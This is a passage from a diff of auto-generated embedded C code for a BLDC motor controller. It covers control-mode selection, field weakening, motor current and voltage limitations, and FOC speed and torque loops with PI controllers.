'/constant5' + * Inport: '/z_ctrlModReq' + * Logic: '/Logical Operator3' + * Logic: '/Logical Operator6' + * Logic: '/Logical Operator9' + * RelationalOperator: '/Relational Operator5' + */ + if (rtDW->is_active_c1_BLDC_controller == 0U) { + rtDW->is_active_c1_BLDC_controller = 1U; + rtDW->is_c1_BLDC_controller = IN_OPEN; + rtDW->z_ctrlMod = OPEN_MODE; + } else if (rtDW->is_c1_BLDC_controller == IN_ACTIVE) { + if (rtb_RelationalOperator1_mv) { + rtDW->is_ACTIVE = IN_NO_ACTIVE_CHILD; + rtDW->is_c1_BLDC_controller = IN_OPEN; + rtDW->z_ctrlMod = OPEN_MODE; + } else { + switch (rtDW->is_ACTIVE) { + case IN_SPEED_MODE: + rtDW->z_ctrlMod = SPD_MODE; + if (!rtb_LogicalOperator1_j) { + rtDW->is_ACTIVE = IN_NO_ACTIVE_CHILD; + if (rtb_LogicalOperator2_p) { + rtDW->is_ACTIVE = IN_TORQUE_MODE; + rtDW->z_ctrlMod = TRQ_MODE; + } else { + rtDW->is_ACTIVE = IN_VOLTAGE_MODE; + rtDW->z_ctrlMod = VLT_MODE; + } + } + break; + + case IN_TORQUE_MODE: + rtDW->z_ctrlMod = TRQ_MODE; + if (!rtb_LogicalOperator2_p) { + rtDW->is_ACTIVE = IN_NO_ACTIVE_CHILD; + if (rtb_LogicalOperator1_j) { + rtDW->is_ACTIVE = IN_SPEED_MODE; + rtDW->z_ctrlMod = SPD_MODE; + } else { + rtDW->is_ACTIVE = IN_VOLTAGE_MODE; + rtDW->z_ctrlMod = VLT_MODE; + } + } + break; + + default: + rtDW->z_ctrlMod = VLT_MODE; + if (rtb_LogicalOperator2_p || rtb_LogicalOperator1_j) { + rtDW->is_ACTIVE = IN_NO_ACTIVE_CHILD; + if (rtb_LogicalOperator2_p) { + rtDW->is_ACTIVE = IN_TORQUE_MODE; + rtDW->z_ctrlMod = TRQ_MODE; + } else if (rtb_LogicalOperator1_j) { + rtDW->is_ACTIVE = IN_SPEED_MODE; + rtDW->z_ctrlMod = SPD_MODE; + } else { + rtDW->is_ACTIVE = IN_VOLTAGE_MODE; + rtDW->z_ctrlMod = VLT_MODE; + } + } + break; + } + } + } else { + rtDW->z_ctrlMod = OPEN_MODE; + if ((!rtb_RelationalOperator1_mv) && ((rtU->z_ctrlModReq == 1) || + rtb_LogicalOperator1_j || rtb_LogicalOperator2_p)) { + rtDW->is_c1_BLDC_controller = IN_ACTIVE; + if (rtb_LogicalOperator2_p) { + rtDW->is_ACTIVE = IN_TORQUE_MODE; + rtDW->z_ctrlMod = TRQ_MODE; + } else if (rtb_LogicalOperator1_j) { + rtDW->is_ACTIVE = IN_SPEED_MODE; + rtDW->z_ctrlMod = SPD_MODE; + } else { + rtDW->is_ACTIVE = IN_VOLTAGE_MODE; + rtDW->z_ctrlMod = VLT_MODE; + } + } + } + + /* End of Chart: '/F03_02_Control_Mode_Manager' */ + + /* If: '/If1' incorporates: + * Constant: '/z_ctrlTypSel' + * Inport: '/r_inpTgt' + * Saturate: '/Saturation' + */ + if (rtP->z_ctrlTypSel == 2) { + /* Outputs for IfAction SubSystem: '/FOC_Control_Type' incorporates: + * ActionPort: '/Action Port' + */ + /* SignalConversion: '/TmpSignal ConversionAtSelectorInport1' incorporates: + * Constant: '/Vd_max' + * Constant: '/constant1' + * Constant: '/i_max' + * Constant: '/n_max' + */ + tmp[0] = 0; + tmp[1] = rtP->Vd_max; + tmp[2] = rtP->n_max; + tmp[3] = rtP->i_max; + + /* End of Outputs for SubSystem: '/FOC_Control_Type' */ + + /* Saturate: '/Saturation' */ + if (DataTypeConversion2 > 16000) { + DataTypeConversion2 = 16000; + } else { + if (DataTypeConversion2 < -16000) { + DataTypeConversion2 = -16000; + } + } + + /* Outputs for IfAction SubSystem: '/FOC_Control_Type' incorporates: + * ActionPort: '/Action Port' + */ + /* Product: '/Divide1' incorporates: + * Inport: '/z_ctrlModReq' + * Product: '/Divide4' + * Selector: '/Selector' + */ + rtb_Saturation = (int16_T)(((uint16_T)((tmp[rtU->z_ctrlModReq] << 5) / 125) + * DataTypeConversion2) >> 12); + + /* End of Outputs for SubSystem: '/FOC_Control_Type' */ + } else if (DataTypeConversion2 > 16000) { + /* Outputs for IfAction SubSystem: '/Default_Control_Type' incorporates: + * ActionPort: '/Action Port' + */ + /* Saturate: '/Saturation' incorporates: + * Inport: '/r_inpTgt' + */ + rtb_Saturation = 16000; + + /* End of Outputs for SubSystem: '/Default_Control_Type' */ + } else if (DataTypeConversion2 < -16000) { + /* Outputs for IfAction SubSystem: '/Default_Control_Type' incorporates: + * ActionPort: '/Action Port' + */ + /* Saturate: '/Saturation' incorporates: + * Inport: '/r_inpTgt' + */ + rtb_Saturation = -16000; + + /* End of Outputs for SubSystem: '/Default_Control_Type' */ + } else { + /* Outputs for IfAction SubSystem: '/Default_Control_Type' incorporates: + * ActionPort: '/Action Port' + */ + rtb_Saturation = DataTypeConversion2; + + /* End of Outputs for SubSystem: '/Default_Control_Type' */ + } + + /* End of If: '/If1' */ + + /* If: '/If2' incorporates: + * Inport: '/r_inpTgtScaRaw' + */ + rtb_Sum2_h = rtDW->If2_ActiveSubsystem_f; + UnitDelay3 = (int8_T)!(rtDW->z_ctrlMod == 0); + rtDW->If2_ActiveSubsystem_f = UnitDelay3; + switch (UnitDelay3) { + case 0: + if (UnitDelay3 != rtb_Sum2_h) { + /* SystemReset for IfAction SubSystem: '/Open_Mode' incorporates: + * ActionPort: '/Action Port' + */ + /* SystemReset for Atomic SubSystem: '/rising_edge_init' */ + /* SystemReset for If: '/If2' incorporates: + * UnitDelay: '/UnitDelay' + * UnitDelay: '/UnitDelay' + */ + rtDW->UnitDelay_DSTATE_b = true; + + /* End of SystemReset for SubSystem: '/rising_edge_init' */ + + /* SystemReset for Atomic SubSystem: '/Rate_Limiter' */ + rtDW->UnitDelay_DSTATE = 0; + + /* End of SystemReset for SubSystem: '/Rate_Limiter' */ + /* End of SystemReset for SubSystem: '/Open_Mode' */ + } + + /* Outputs for IfAction SubSystem: '/Open_Mode' incorporates: + * ActionPort: '/Action Port' + */ + /* DataTypeConversion: '/Data Type Conversion' incorporates: + * UnitDelay: '/UnitDelay4' + */ + rtb_Gain3 = rtDW->UnitDelay4_DSTATE_eu << 12; + rtb_Sum1_jt = (rtb_Gain3 & 134217728) != 0 ? rtb_Gain3 | -134217728 : + rtb_Gain3 & 134217727; + + /* Outputs for Atomic SubSystem: '/rising_edge_init' */ + /* UnitDelay: '/UnitDelay' */ + rtb_RelationalOperator1_mv = rtDW->UnitDelay_DSTATE_b; + + /* Update for UnitDelay: '/UnitDelay' incorporates: + * Constant: '/Constant' + */ + rtDW->UnitDelay_DSTATE_b = false; + + /* End of Outputs for SubSystem: '/rising_edge_init' */ + + /* Outputs for Atomic SubSystem: '/Rate_Limiter' */ + /* Switch: '/Switch1' incorporates: + * UnitDelay: '/UnitDelay' + */ + if (rtb_RelationalOperator1_mv) { + rtb_Switch1 = rtb_Sum1_jt; + } else { + rtb_Switch1 = rtDW->UnitDelay_DSTATE; + } + + /* End of Switch: '/Switch1' */ + + /* Sum: '/Sum1' */ + rtb_Gain3 = -rtb_Switch1; + rtb_Sum1 = (rtb_Gain3 & 134217728) != 0 ? rtb_Gain3 | -134217728 : + rtb_Gain3 & 134217727; + + /* Switch: '/Switch2' incorporates: + * Constant: '/dV_openRate' + * RelationalOperator: '/LowerRelop1' + */ + if (rtb_Sum1 > rtP->dV_openRate) { + rtb_Sum1 = rtP->dV_openRate; + } else { + /* Gain: '/Gain3' */ + rtb_Gain3 = -rtP->dV_openRate; + rtb_Gain3 = (rtb_Gain3 & 134217728) != 0 ? rtb_Gain3 | -134217728 : + rtb_Gain3 & 134217727; + + /* Switch: '/Switch' incorporates: + * RelationalOperator: '/UpperRelop' + */ + if (rtb_Sum1 < rtb_Gain3) { + rtb_Sum1 = rtb_Gain3; + } + + /* End of Switch: '/Switch' */ + } + + /* End of Switch: '/Switch2' */ + + /* Sum: '/Sum2' */ + rtb_Gain3 = rtb_Sum1 + rtb_Switch1; + rtb_Switch1 = (rtb_Gain3 & 134217728) != 0 ? rtb_Gain3 | -134217728 : + rtb_Gain3 & 134217727; + + /* Switch: '/Switch2' */ + if (rtb_RelationalOperator1_mv) { + /* Update for UnitDelay: '/UnitDelay' */ + rtDW->UnitDelay_DSTATE = rtb_Sum1_jt; + } else { + /* Update for UnitDelay: '/UnitDelay' */ + rtDW->UnitDelay_DSTATE = rtb_Switch1; + } + + /* End of Switch: '/Switch2' */ + /* End of Outputs for SubSystem: '/Rate_Limiter' */ + + /* DataTypeConversion: '/Data Type Conversion1' */ + rtDW->Merge1 = (int16_T)(rtb_Switch1 >> 12); + + /* End of Outputs for SubSystem: '/Open_Mode' */ + break; + + case 1: + /* Outputs for IfAction SubSystem: '/Default_Mode' incorporates: + * ActionPort: '/Action Port' + */ + rtDW->Merge1 = rtb_Saturation; + + /* End of Outputs for SubSystem: '/Default_Mode' */ + break; + } + + /* End of If: '/If2' */ + + /* Abs: '/Abs1' */ + if (rtDW->Merge1 < 0) { + rtDW->Abs1 = (int16_T)-rtDW->Merge1; + } else { + rtDW->Abs1 = rtDW->Merge1; + } + + /* End of Abs: '/Abs1' */ + /* End of Outputs for SubSystem: '/F03_Control_Mode_Manager' */ + } else if (rtDW->UnitDelay5_DSTATE_m) { + /* Outputs for Function Call SubSystem: '/F04_Field_Weakening' */ + /* If: '/If3' incorporates: + * Constant: '/b_fieldWeakEna' + */ + if (rtP->b_fieldWeakEna) { + /* Outputs for IfAction SubSystem: '/Field_Weakening_Enabled' incorporates: + * ActionPort: '/Action Port' + */ + /* Abs: '/Abs5' */ + if (DataTypeConversion2 < 0) { + DataTypeConversion2 = (int16_T)-DataTypeConversion2; + } + + /* End of Abs: '/Abs5' */ + + /* Switch: '/Switch2' incorporates: + * Constant: '/r_fieldWeakHi' + * Constant: '/r_fieldWeakLo' + * RelationalOperator: '/LowerRelop1' + * RelationalOperator: '/UpperRelop' + * Switch: '/Switch' + */ + if (DataTypeConversion2 > rtP->r_fieldWeakHi) { + DataTypeConversion2 = rtP->r_fieldWeakHi; + } else { + if (DataTypeConversion2 < rtP->r_fieldWeakLo) { + /* Switch: '/Switch' incorporates: + * Constant: '/r_fieldWeakLo' + */ + DataTypeConversion2 = rtP->r_fieldWeakLo; + } + } + + /* End of Switch: '/Switch2' */ + + /* Product: '/Divide14' incorporates: + * Constant: '/r_fieldWeakHi' + * Constant: '/r_fieldWeakLo' + * Sum: '/Sum1' + * Sum: '/Sum3' + */ + rtb_Divide14_e = (uint16_T)(((int16_T)(DataTypeConversion2 - + rtP->r_fieldWeakLo) << 15) / (int16_T)(rtP->r_fieldWeakHi - + rtP->r_fieldWeakLo)); + + /* Switch: '/Switch2' incorporates: + * Constant: '/n_fieldWeakAuthHi' + * Constant: '/n_fieldWeakAuthLo' + * RelationalOperator: '/LowerRelop1' + * RelationalOperator: '/UpperRelop' + * Switch: '/Switch' + */ + if (Abs5 > rtP->n_fieldWeakAuthHi) { + rtb_Saturation = rtP->n_fieldWeakAuthHi; + } else if (Abs5 < rtP->n_fieldWeakAuthLo) { + /* Switch: '/Switch' incorporates: + * Constant: '/n_fieldWeakAuthLo' + */ + rtb_Saturation = rtP->n_fieldWeakAuthLo; + } else { + rtb_Saturation = Abs5; + } + + /* End of Switch: '/Switch2' */ + + /* Product: '/Divide1' incorporates: + * Constant: '/n_fieldWeakAuthHi' + * Constant: '/n_fieldWeakAuthLo' + * Sum: '/Sum2' + * Sum: '/Sum4' + */ + rtb_Divide1_f = (uint16_T)(((int16_T)(rtb_Saturation - + rtP->n_fieldWeakAuthLo) << 15) / (int16_T)(rtP->n_fieldWeakAuthHi - + rtP->n_fieldWeakAuthLo)); + + /* Switch: '/Switch1' incorporates: + * MinMax: '/MinMax1' + * RelationalOperator: '/Relational Operator6' + */ + if (rtb_Divide14_e < rtb_Divide1_f) { + /* MinMax: '/MinMax' */ + if (!(rtb_Divide14_e > rtb_Divide1_f)) { + rtb_Divide14_e = rtb_Divide1_f; + } + + /* End of MinMax: '/MinMax' */ + } else { + if (rtb_Divide1_f < rtb_Divide14_e) { + /* MinMax: '/MinMax1' */ + rtb_Divide14_e = rtb_Divide1_f; + } + } + + /* End of Switch: '/Switch1' */ + + /* Switch: '/Switch2' incorporates: + * Constant: '/z_ctrlTypSel' + * Constant: '/CTRL_COMM2' + * Constant: '/a_phaAdvMax' + * Constant: '/id_fieldWeakMax' + * RelationalOperator: '/Relational Operator1' + */ + if (rtP->z_ctrlTypSel == 2) { + rtb_Saturation1 = rtP->id_fieldWeakMax; + } else { + rtb_Saturation1 = rtP->a_phaAdvMax; + } + + /* End of Switch: '/Switch2' */ + + /* Product: '/Divide3' */ + rtDW->Divide3 = (int16_T)((rtb_Saturation1 * rtb_Divide14_e) >> 15); + + /* End of Outputs for SubSystem: '/Field_Weakening_Enabled' */ + } + + /* End of If: '/If3' */ + /* End of Outputs for SubSystem: '/F04_Field_Weakening' */ + + /* Outputs for Function Call SubSystem: '/Motor_Limitations' */ + /* If: '/If1' incorporates: + * Constant: '/z_ctrlTypSel' + * Constant: '/Vd_max1' + * Constant: '/i_max' + */ + rtb_Sum2_h = rtDW->If1_ActiveSubsystem_o; + UnitDelay3 = -1; + if (rtP->z_ctrlTypSel == 2) { + UnitDelay3 = 0; + } + + rtDW->If1_ActiveSubsystem_o = UnitDelay3; + if ((rtb_Sum2_h != UnitDelay3) && (rtb_Sum2_h == 0)) { + /* Disable for SwitchCase: '/Switch Case' */ + rtDW->SwitchCase_ActiveSubsystem_d = -1; + } + + if (UnitDelay3 == 0) { + /* Outputs for IfAction SubSystem: '/Motor_Limitations_Enabled' incorporates: + * ActionPort: '/Action Port' + */ + rtDW->Vd_max1 = rtP->Vd_max; + + /* Gain: '/Gain3' incorporates: + * Constant: '/Vd_max1' + */ + rtDW->Gain3 = (int16_T)-rtDW->Vd_max1; + + /* Interpolation_n-D: '/Vq_max_M1' incorporates: + * Abs: '/Abs5' + * PreLookup: '/Vq_max_XA' + * UnitDelay: '/UnitDelay4' + */ + if (rtDW->Switch1 < 0) { + rtb_Saturation1 = (int16_T)-rtDW->Switch1; + } else { + rtb_Saturation1 = rtDW->Switch1; + } + + rtDW->Vq_max_M1 = rtP->Vq_max_M1[plook_u8s16_evencka(rtb_Saturation1, + rtP->Vq_max_XA[0], (uint16_T)(rtP->Vq_max_XA[1] - rtP->Vq_max_XA[0]), + 45U)]; + + /* End of Interpolation_n-D: '/Vq_max_M1' */ + + /* Gain: '/Gain5' */ + rtDW->Gain5 = (int16_T)-rtDW->Vq_max_M1; + rtDW->i_max = rtP->i_max; + + /* Interpolation_n-D: '/iq_maxSca_M1' incorporates: + * Constant: '/i_max' + * Product: '/Divide4' + */ + rtb_Gain3 = rtDW->Divide3 << 16; + rtb_Gain3 = (rtb_Gain3 == MIN_int32_T) && (rtDW->i_max == -1) ? + MAX_int32_T : rtb_Gain3 / rtDW->i_max; + if (rtb_Gain3 < 0) { + rtb_Gain3 = 0; + } else { + if (rtb_Gain3 > 65535) { + rtb_Gain3 = 65535; + } + } + + /* Product: '/Divide1' incorporates: + * Interpolation_n-D: '/iq_maxSca_M1' + * PreLookup: '/iq_maxSca_XA' + * Product: '/Divide4' + */ + rtDW->Divide1_n = (int16_T) + ((rtConstP.iq_maxSca_M1_Table[plook_u8u16_evencka((uint16_T)rtb_Gain3, + 0U, 1311U, 49U)] * rtDW->i_max) >> 16); + + /* Gain: '/Gain1' */ + rtDW->Gain1 = (int16_T)-rtDW->Divide1_n; + + /* SwitchCase: '/Switch Case' incorporates: + * Constant: '/n_max1' + * Constant: '/Constant1' + * Constant: '/cf_KbLimProt' + * Constant: '/cf_nKiLimProt' + * Constant: '/Constant' + * Constant: '/Constant1' + * Constant: '/cf_KbLimProt' + * Constant: '/cf_iqKiLimProt' + * Constant: '/cf_nKiLimProt' + * Sum: '/Sum1' + * Sum: '/Sum1' + * Sum: '/Sum2' + */ + rtb_Sum2_h = rtDW->SwitchCase_ActiveSubsystem_d; + UnitDelay3 = -1; + switch (rtDW->z_ctrlMod) { + case 1: + UnitDelay3 = 0; + break; + + case 2: + UnitDelay3 = 1; + break; + + case 3: + UnitDelay3 = 2; + break; + } + + rtDW->SwitchCase_ActiveSubsystem_d = UnitDelay3; + switch (UnitDelay3) { + case 0: + if (UnitDelay3 != rtb_Sum2_h) { + /* SystemReset for IfAction SubSystem: '/Voltage_Mode_Protection' incorporates: + * ActionPort: '/Action Port' + */ + + /* SystemReset for Atomic SubSystem: '/I_backCalc_fixdt' */ + + /* SystemReset for SwitchCase: '/Switch Case' */ + I_backCalc_fixdt_Reset(&rtDW->I_backCalc_fixdt_i, 65536000); + + /* End of SystemReset for SubSystem: '/I_backCalc_fixdt' */ + + /* SystemReset for Atomic SubSystem: '/I_backCalc_fixdt1' */ + I_backCalc_fixdt_Reset(&rtDW->I_backCalc_fixdt1, 65536000); + + /* End of SystemReset for SubSystem: '/I_backCalc_fixdt1' */ + + /* End of SystemReset for SubSystem: '/Voltage_Mode_Protection' */ + } + + /* Outputs for IfAction SubSystem: '/Voltage_Mode_Protection' incorporates: + * ActionPort: '/Action Port' + */ + + /* Outputs for Atomic SubSystem: '/I_backCalc_fixdt' */ + I_backCalc_fixdt((int16_T)(rtDW->Divide1_n - rtDW->Abs5_h), + rtP->cf_iqKiLimProt, rtP->cf_KbLimProt, rtDW->Abs1, 0, + &rtDW->Switch2_a, &rtDW->I_backCalc_fixdt_i); + + /* End of Outputs for SubSystem: '/I_backCalc_fixdt' */ + + /* Outputs for Atomic SubSystem: '/I_backCalc_fixdt1' */ + I_backCalc_fixdt((int16_T)(rtP->n_max - Abs5), rtP->cf_nKiLimProt, + rtP->cf_KbLimProt, rtDW->Abs1, 0, &rtDW->Switch2_o, + &rtDW->I_backCalc_fixdt1); + + /* End of Outputs for SubSystem: '/I_backCalc_fixdt1' */ + + /* End of Outputs for SubSystem: '/Voltage_Mode_Protection' */ + break; + + case 1: + /* Outputs for IfAction SubSystem: '/Speed_Mode_Protection' incorporates: + * ActionPort: '/Action Port' + */ + /* Switch: '/Switch2' incorporates: + * RelationalOperator: '/LowerRelop1' + * RelationalOperator: '/UpperRelop' + * Switch: '/Switch' + */ + if (rtDW->DataTypeConversion[0] > rtDW->Divide1_n) { + rtb_Saturation1 = rtDW->Divide1_n; + } else if (rtDW->DataTypeConversion[0] < rtDW->Gain1) { + /* Switch: '/Switch' */ + rtb_Saturation1 = rtDW->Gain1; + } else { + rtb_Saturation1 = rtDW->DataTypeConversion[0]; + } + + /* End of Switch: '/Switch2' */ + + /* Product: '/Divide1' incorporates: + * Constant: '/cf_iqKiLimProt' + * Sum: '/Sum3' + */ + rtDW->Divide1 = (int16_T)(rtb_Saturation1 - rtDW->DataTypeConversion[0]) + * rtP->cf_iqKiLimProt; + + /* End of Outputs for SubSystem: '/Speed_Mode_Protection' */ + break; + + case 2: + if (UnitDelay3 != rtb_Sum2_h) { + /* SystemReset for IfAction SubSystem: '/Torque_Mode_Protection' incorporates: + * ActionPort: '/Action Port' + */ + + /* SystemReset for Atomic SubSystem: '/I_backCalc_fixdt' */ + + /* SystemReset for SwitchCase: '/Switch Case' */ + I_backCalc_fixdt_Reset(&rtDW->I_backCalc_fixdt_j, 58982400); + + /* End of SystemReset for SubSystem: '/I_backCalc_fixdt' */ + + /* End of SystemReset for SubSystem: '/Torque_Mode_Protection' */ + } + + /* Outputs for IfAction SubSystem: '/Torque_Mode_Protection' incorporates: + * ActionPort: '/Action Port' + */ + + /* Outputs for Atomic SubSystem: '/I_backCalc_fixdt' */ + I_backCalc_fixdt((int16_T)(rtP->n_max - Abs5), rtP->cf_nKiLimProt, + rtP->cf_KbLimProt, rtDW->Vq_max_M1, 0, &rtDW->Switch2_i, + &rtDW->I_backCalc_fixdt_j); + + /* End of Outputs for SubSystem: '/I_backCalc_fixdt' */ + + /* End of Outputs for SubSystem: '/Torque_Mode_Protection' */ + break; + } + + /* End of SwitchCase: '/Switch Case' */ + + /* Gain: '/Gain4' */ + rtDW->Gain4 = (int16_T)-rtDW->i_max; + + /* End of Outputs for SubSystem: '/Motor_Limitations_Enabled' */ + } + + /* End of If: '/If1' */ + /* End of Outputs for SubSystem: '/Motor_Limitations' */ + } else { + if (rtDW->UnitDelay6_DSTATE) { + /* Outputs for Function Call SubSystem: '/FOC' */ + /* If: '/If1' incorporates: + * Constant: '/z_ctrlTypSel' + */ + rtb_Sum2_h = rtDW->If1_ActiveSubsystem_j; + UnitDelay3 = -1; + if (rtP->z_ctrlTypSel == 2) { + UnitDelay3 = 0; + } + + rtDW->If1_ActiveSubsystem_j = UnitDelay3; + if ((rtb_Sum2_h != UnitDelay3) && (rtb_Sum2_h == 0)) { + /* Disable for SwitchCase: '/Switch Case' */ + rtDW->SwitchCase_ActiveSubsystem = -1; + + /* Disable for If: '/If1' */ + rtDW->If1_ActiveSubsystem_a = -1; + } + + if (UnitDelay3 == 0) { + /* Outputs for IfAction SubSystem: '/FOC_Enabled' incorporates: + * ActionPort: '/Action Port' + */ + /* SwitchCase: '/Switch Case' incorporates: + * Constant: '/cf_nKi' + * Constant: '/cf_nKp' + * Inport: '/r_inpTgtSca' + * Sum: '/Sum3' + * UnitDelay: '/UnitDelay4' + */ + rtb_Sum2_h = rtDW->SwitchCase_ActiveSubsystem; + switch (rtDW->z_ctrlMod) { + case 1: + break; + + case 2: + UnitDelay3 = 1; + break; + + case 3: + UnitDelay3 = 2; + break; + + default: + UnitDelay3 = 3; + break; + } + + rtDW->SwitchCase_ActiveSubsystem = UnitDelay3; + switch (UnitDelay3) { + case 0: + /* Outputs for IfAction SubSystem: '/Voltage_Mode' incorporates: + * ActionPort: '/Action Port' + */ + /* MinMax: '/MinMax' */ + if (rtDW->Abs1 < rtDW->Switch2_a) { + DataTypeConversion2 = rtDW->Abs1; + } else { + DataTypeConversion2 = rtDW->Switch2_a; + } + + if (!(DataTypeConversion2 < rtDW->Switch2_o)) { + DataTypeConversion2 = rtDW->Switch2_o; + } + + /* End of MinMax: '/MinMax' */ + + /* Signum: '/SignDeltaU2' */ + if (rtDW->Merge1 < 0) { + rtb_Saturation1 = -1; + } else { + rtb_Saturation1 = (int16_T)(rtDW->Merge1 > 0); + } + + /* End of Signum: '/SignDeltaU2' */ + + /* Product: '/Divide1' */ + rtb_Saturation = (int16_T)(DataTypeConversion2 * rtb_Saturation1); + + /* Switch: '/Switch2' incorporates: + * RelationalOperator: '/LowerRelop1' + * RelationalOperator: '/UpperRelop' + * Switch: '/Switch' + */ + if (rtb_Saturation > rtDW->Vq_max_M1) { + /* SignalConversion: '/Signal Conversion2' */ + rtDW->Merge = rtDW->Vq_max_M1; + } else if (rtb_Saturation < rtDW->Gain5) { + /* Switch: '/Switch' incorporates: + * SignalConversion: '/Signal Conversion2' + */ + rtDW->Merge = rtDW->Gain5; + } else { + /* SignalConversion: '/Signal Conversion2' incorporates: + * Switch: '/Switch' + */ + rtDW->Merge = rtb_Saturation; + } + + /* End of Switch: '/Switch2' */ + /* End of Outputs for SubSystem: '/Voltage_Mode' */ + break; + + case 1: + if (UnitDelay3 != rtb_Sum2_h) { + /* SystemReset for IfAction SubSystem: '/Speed_Mode' incorporates: + * ActionPort: '/Action Port' + */ + + /* SystemReset for Atomic SubSystem: '/PI_clamp_fixdt' */ + + /* SystemReset for SwitchCase: '/Switch Case' */ + PI_clamp_fixdt_b_Reset(&rtDW->PI_clamp_fixdt_l4); + + /* End of SystemReset for SubSystem: '/PI_clamp_fixdt' */ + + /* End of SystemReset for SubSystem: '/Speed_Mode' */ + } + + /* Outputs for IfAction SubSystem: '/Speed_Mode' incorporates: + * ActionPort: '/Action Port' + */ + /* DataTypeConversion: '/Data Type Conversion2' incorporates: + * Constant: '/n_cruiseMotTgt' + */ + rtb_Saturation = (int16_T)(rtP->n_cruiseMotTgt << 4); + + /* Switch: '/Switch4' incorporates: + * Constant: '/b_cruiseCtrlEna' + * Logic: '/Logical Operator1' + * RelationalOperator: '/Relational Operator3' + */ + if (rtP->b_cruiseCtrlEna && (rtb_Saturation != 0)) { + /* Switch: '/Switch3' incorporates: + * MinMax: '/MinMax4' + */ + if (rtb_Saturation > 0) { + rtb_TmpSignalConversionAtLow_Pa[0] = rtDW->Vq_max_M1; + + /* MinMax: '/MinMax3' */ + if (rtDW->Merge1 > rtDW->Gain5) { + rtb_TmpSignalConversionAtLow_Pa[1] = rtDW->Merge1; + } else { + rtb_TmpSignalConversionAtLow_Pa[1] = rtDW->Gain5; + } + + /* End of MinMax: '/MinMax3' */ + } else { + if (rtDW->Vq_max_M1 < rtDW->Merge1) { + /* MinMax: '/MinMax4' */ + rtb_TmpSignalConversionAtLow_Pa[0] = rtDW->Vq_max_M1; + } else { + rtb_TmpSignalConversionAtLow_Pa[0] = rtDW->Merge1; + } + + rtb_TmpSignalConversionAtLow_Pa[1] = rtDW->Gain5; + } + + /* End of Switch: '/Switch3' */ + } else { + rtb_TmpSignalConversionAtLow_Pa[0] = rtDW->Vq_max_M1; + rtb_TmpSignalConversionAtLow_Pa[1] = rtDW->Gain5; + } + + /* End of Switch: '/Switch4' */ + + /* Switch: '/Switch2' incorporates: + * Constant: '/b_cruiseCtrlEna' + */ + if (!rtP->b_cruiseCtrlEna) { + rtb_Saturation = rtDW->Merge1; + } + + /* End of Switch: '/Switch2' */ + + /* Sum: '/Sum3' */ + rtb_Gain3 = rtb_Saturation - Switch2; + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Outputs for Atomic SubSystem: '/PI_clamp_fixdt' */ + PI_clamp_fixdt_l((int16_T)rtb_Gain3, rtP->cf_nKp, rtP->cf_nKi, + rtDW->UnitDelay4_DSTATE_eu, + rtb_TmpSignalConversionAtLow_Pa[0], + rtb_TmpSignalConversionAtLow_Pa[1], rtDW->Divide1, + &rtDW->Merge, &rtDW->PI_clamp_fixdt_l4); + + /* End of Outputs for SubSystem: '/PI_clamp_fixdt' */ + + /* End of Outputs for SubSystem: '/Speed_Mode' */ + break; + + case 2: + if (UnitDelay3 != rtb_Sum2_h) { + /* SystemReset for IfAction SubSystem: '/Torque_Mode' incorporates: + * ActionPort: '/Action Port' + */ + + /* SystemReset for Atomic SubSystem: '/PI_clamp_fixdt' */ + + /* SystemReset for SwitchCase: '/Switch Case' */ + PI_clamp_fixdt_g_Reset(&rtDW->PI_clamp_fixdt_kh); + + /* End of SystemReset for SubSystem: '/PI_clamp_fixdt' */ + + /* End of SystemReset for SubSystem: '/Torque_Mode' */ + } + + /* Outputs for IfAction SubSystem: '/Torque_Mode' incorporates: + * ActionPort: '/Action Port' + */ + /* Gain: '/Gain4' */ + rtb_Saturation = (int16_T)-rtDW->Switch2_i; + + /* Switch: '/Switch2' incorporates: + * RelationalOperator: '/LowerRelop1' + * RelationalOperator: '/UpperRelop' + * Switch: '/Switch' + */ + if (rtDW->Merge1 > rtDW->Divide1_n) { + rtb_Saturation1 = rtDW->Divide1_n; + } else if (rtDW->Merge1 < rtDW->Gain1) { + /* Switch: '/Switch' */ + rtb_Saturation1 = rtDW->Gain1; + } else { + rtb_Saturation1 = rtDW->Merge1; + } + + /* End of Switch: '/Switch2' */ + + /* Sum: '/Sum2' */ + rtb_Gain3 = rtb_Saturation1 - rtDW->DataTypeConversion[0]; + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* MinMax: '/MinMax1' */ + if (rtDW->Vq_max_M1 < rtDW->Switch2_i) { + rtb_Saturation1 = rtDW->Vq_max_M1; + } else { + rtb_Saturation1 = rtDW->Switch2_i; + } + + /* End of MinMax: '/MinMax1' */ + + /* MinMax: '/MinMax2' */ + if (!(rtb_Saturation > rtDW->Gain5)) { + rtb_Saturation = rtDW->Gain5; + } + + /* End of MinMax: '/MinMax2' */ + + /* Outputs for Atomic SubSystem: '/PI_clamp_fixdt' */ + + /* SignalConversion: '/Signal Conversion2' incorporates: + * Constant: '/cf_iqKi' + * Constant: '/cf_iqKp' + * Constant: '/constant2' + * Sum: '/Sum2' + * UnitDelay: '/UnitDelay4' + */ + PI_clamp_fixdt_k((int16_T)rtb_Gain3, rtP->cf_iqKp, rtP->cf_iqKi, + rtDW->UnitDelay4_DSTATE_eu, rtb_Saturation1, + rtb_Saturation, 0, &rtDW->Merge, + &rtDW->PI_clamp_fixdt_kh); + + /* End of Outputs for SubSystem: '/PI_clamp_fixdt' */ + + /* End of Outputs for SubSystem: '/Torque_Mode' */ + break; + + case 3: + /* Outputs for IfAction SubSystem: '/Open_Mode' incorporates: + * ActionPort: '/Action Port' + */ + rtDW->Merge = rtDW->Merge1; + + /* End of Outputs for SubSystem: '/Open_Mode' */ + break; + } + + /* End of SwitchCase: '/Switch Case' */ + + /* If: '/If1' incorporates: + * Constant: '/cf_idKi1' + * Constant: '/cf_idKp1' + * Constant: '/constant1' + * Constant: '/constant2' + * Sum: '/Sum3' + */ + rtb_Sum2_h = rtDW->If1_ActiveSubsystem_a; + UnitDelay3 = -1; + if (rtb_LogicalOperator) { + UnitDelay3 = 0; + } + + rtDW->If1_ActiveSubsystem_a = UnitDelay3; + if (UnitDelay3 == 0) { + if (0 != rtb_Sum2_h) { + /* SystemReset for IfAction SubSystem: '/Vd_Calculation' incorporates: + * ActionPort: '/Action Port' + */ + + /* SystemReset for Atomic SubSystem: '/PI_clamp_fixdt' */ + + /* SystemReset for If: '/If1' */ + 